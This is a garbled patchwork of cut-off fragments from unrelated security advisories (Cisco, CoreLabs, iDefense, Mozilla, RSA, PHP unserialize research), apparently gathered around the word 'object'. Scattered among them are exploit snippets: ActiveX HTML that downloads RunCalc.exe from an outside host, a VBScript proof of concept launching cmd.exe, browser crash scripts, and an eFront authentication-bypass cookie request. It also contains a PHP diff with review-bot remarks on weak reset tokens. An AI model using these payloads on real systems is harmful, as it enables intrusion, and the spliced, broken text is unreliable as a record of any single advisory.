objects
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software Object-group Access
Control List Bypass Vulnerability
Advisory ID: cisco-sa-20090923-acl
Revision 1.0
The HTML code needed to start a download using the ActiveX control looks
something like the following code:
<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
codebase="http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8" width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
concatenation of those byte ranges of the final file that are specified
by the ByteRange field.
To simplify reasoning about the attack, the following uses a model of a
"byte sequence with a gap of a defined size", where the "gap" is an object
that occupies address space in the sequence but has no other properties.
Using this model, one can describe the process of the creation of a
signed PDF file as follows:
~ Core Security Technologies - CoreLabs Advisory
~ http://www.coresecurity.com/corelabs/
~ Anzio Web Print Object Buffer Overflow
*Advisory Information*
Title: Anzio Web Print Object Buffer Overflow
CVE-2010-3451:
OpenOffice.org uses its own internal memory management system for parsing
tables in RTF documents. Information about each table row is inserted, element
by element, into an SwTableBoxes object. These objects contain a fixed amount
of data, and when they have reached capacity, a resize() method is called to
double the space previously allocated for cell contents. When this method is
called, the new space will be allocated on top of recently freed memory
containing file data without clearing this memory. Because of a bug in the RTF
parser, corrupt table data may cause the insertion of elements into an
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
var optarray;
var mshtmlbase;
//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;
function strtoint(str) {
by add-ons that might perform privileged actions resulting in
something like a Cross-Site Request Forgery (CSRF) attack against
the add-on. Potential severity would depend on the add-ons installed
(CVE-2010-0168).
Mozilla developer Blake Kaplan reported that the window.location object
was made a normal overridable JavaScript object in the Firefox 3.6
browser engine (Gecko 1.9.2) because new mechanisms were developed
to enforce the same-origin policy between windows and frames. This
object is unfortunately also used by some plugins to determine the page
origin used for access restrictions. A malicious page could override
ESA-2010-018: RSA Security Advisory: RSA, The Security Division of EMC, announces a fix for a potential security vulnerability in RSA® Authentication Client when storing secret key objects on an RSA SecurID® 800 Authenticator
RSA Authentication Client 2.0.x, 3.0, and 3.5.x contain a potential vulnerability that could allow the unintended extraction, by a properly authenticated user, of secret (or symmetric) key objects stored on an RSA SecurID 800 Authenticator. This potential vulnerability is corrected in RSA Authentication Client 3.5.3.
Description:
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities
1. *Advisory Information*
Title: Internet Explorer Dynamic OBJECT tag and URLMON sniffing
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 11, 2009
I. BACKGROUND
Microsoft's Component Object Model (COM) was designed to allow
interoperability between disjointed software components. It is a
standardized interface solution to the programming dilemmas involved in
object oriented programming, distributed transactions, and
inter-language communications. COM is involved at some level in DDE,
OLE, COM+, ActiveX, and DCOM. COM objects can be embedded in various
</script>
</head>
<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A">
</object>
</body>
</html>
= vstlbinf.dll
=
= Public disclosure on Wednesday August 15, 2007
========================================================================
The TypeLib Information object library, implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing
functionality easily accessible to both Visual Basic and C++
programmers.
Although it is not marked as safe for scripting in the registry, it does
Testing shows that to some degree, ClickOnce does check whether it is
loaded from the Temporary Internet Files folder. In such a situation,
ClickOnce will show a warning dialog similar to the dialog shown in
figure 1. This specifically happens when the ClickOnce application files
are saved in the Temporary Internet Files folder using Internet
Explorer; for example using object tags with the type attribute set to
text/plain. If the deployment manifest is opened (i.e. using Windows
Explorer), the warning is shown.
Permissions in the Local Machine security zone
The main advantage over the previous command line tools CACLS.EXE [5],
XCACLS.EXE [6] and XCACLS.VBS [7] is the ability to specify
inheritance and to process/propagate inheritable permissions.
But exactly this handling of inheritance is severely broken: in an
object's security descriptor both the DACL and the SACL can be marked as
"PROTECTED", meaning that inheritable ACEs from the parent object
are NOT to be applied to the object and its children [8][9].
ICACLS.EXE, when operating on an object with protected ACLs, but
1. ignores this protection,
http://www.adobe.com/products/flashplayer
II. DESCRIPTION
Remote exploitation of an invalid object reference vulnerability in Adobe
Systems Inc.'s Flash Player could allow an attacker to execute arbitrary
code with the privileges of the current user.
During the processing of a Shockwave Flash file, a particular object can
be created, along with multiple references that point to the object. The
This will unserialize() any user input supplied to an application
using PHPIDS. Therefore an exploit against applications using the
Zend Framework is straightforward.
When trying to exploit an unserialize() vulnerability in a PHP
application, the first step is to enumerate the objects that contain
__wakeup() or __destruct() methods and read their code to analyze whether
these methods are doing something interesting.
When looking at the Zend Framework, one particular class can be
found that can be used in a code execution attack. This class is
###############################################################################################
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26
<object id="xiaonei" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6"
style="display:none;">
</object>
<script>
function crash() {
var buff = '';
high profile websites like: banking websites, political party websites,
gaming websites, blogs and even security company websites.
During our research in unserialize() vulnerabilities it was discovered
that Piwik unserializes data from the user supplied cookie. By
unserializing some of Piwik's objects it is possible to write
arbitrary files to writable locations on the webserver which
can be used to upload e.g. PHP files to writable directories
within the webserver's document root which usually exist in a
standard Piwik installation. In newer versions of Piwik it is
also possible to execute arbitrary PHP code directly.
207. try {
208. $user = EfrontUserFactory :: factory($_COOKIE['cookie_login']);
209. $user -> login($_COOKIE['cookie_password'], true);
Input passed through $_COOKIE['cookie_login'] isn't properly sanitized before being used at
line 208 to instantiate a new user object via the EfrontUserFactory::factory() method. This can
be exploited to bypass authentication and to escalate privileges. Proof of concept request:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login[login]=admin;cookie_login[active]=1;cookie_login[user_type]=administrator;cookie_login[password]=1;cookie_password=1
- $username = $_POST['reset_username'];
- $userrows = select_bhdb("users", array("username"=>$username), "");
+ $xgqd_username = $_POST['reset_username'];
+ $userrows = select_bhdb("users", array("username"=>$xgqd_username), "");
if (empty($userrows)) {
# Open layout object
$layoutobj = new bhlayout("generic");
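Review bot: renaming `$username` to `$xgqd_username` does not change how `$_POST['reset_username']` reaches `select_bhdb("users", array("username"=>$xgqd_username), "")`; no validation or escaping of the value is visible in this hunk, so if the concern behind the change was untrusted input flowing into the user lookup, the rename alone does not address it. Either validate the username format before the lookup or state in the commit message why only the rename is needed.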
@@ -31,16 +31,16 @@
} else {
# Insert a password reset request row for that username
$resetid = md5(time().rand(1, 99999).rand(54, time()));
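Review bot: the reset identifier `$resetid = md5(time().rand(1, 99999).rand(54, time()));` in the unchanged context is derived from the current time and PHP's `rand()`, neither of which is a cryptographically secure source, so the token space is small and partly predictable. A password-reset identifier should be generated from a CSPRNG (for example `random_bytes()` on PHP 7+, or `openssl_random_pseudo_bytes()` on older versions) and then hex-encoded; since this file is being touched anyway, this hunk is a reasonable place to make that change.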
Day Initiative that JavaScript arrays were vulnerable to an integer
overflow vulnerability. The report demonstrated that an array could
be constructed containing a very large number of items such that when
memory was allocated to store the array items, the integer value used
to calculate the buffer size would overflow resulting in too small a
buffer being allocated. Subsequent use of the array object could then
result in data being written past the end of the buffer and causing
memory corruption (CVE-2010-3767).
Security researcher regenrecht reported via TippingPoint's Zero Day
Initiative that a nsDOMAttribute node can be modified without informing
Remote exploitation of a memory corruption vulnerability in Microsoft
Corp.'s Internet Explorer could allow an attacker to execute arbitrary
code with the privileges of the current user.
The vulnerability occurs when a Javascript event handler such as
"onload" is set on a Javascript object's attributes or childNodes
collection. An event object is created and this object's memory is later
freed; however, a reference to the object remains. When the reference is
later used to access the event object, this now-invalid memory is
treated as a valid object. The corrupt object's vtable is used to make
an indirect function call. This may result in the execution of arbitrary
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 28, 2009
I. BACKGROUND
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
3. There are some HTML tags which allow embedding content from
external files and treating it as a specific format regardless of the
file extension. For example, the HTML '<object/>' tag:
/-----------
<object data="index.dat" type="text/html" width="100%" height="50"></object>
-----------/
http://www.adobe.com/products/flashplayer
II. DESCRIPTION
Remote exploitation of an invalid Loader object reference vulnerability
in Adobe Systems Inc.'s Flash Player could allow an attacker to execute
arbitrary code with the privileges of the current user.
During the processing of a Shockwave Flash file, an object can be
created, along with multiple references that point to the object. The
Remote exploitation of a use after free vulnerability in Microsoft
Corp.'s Internet Explorer could allow an attacker to execute arbitrary
code with the privileges of the current user.
The vulnerability occurs when an HTML object with an
'onreadystatechange' event handler is not properly freed. This event is
used to perform actions when the state of some HTML object changes; for
example, when a form has data input. Specifically, when certain
properties of the object are changed, the event handler function object
is freed, but a reference to it remains. When the object is later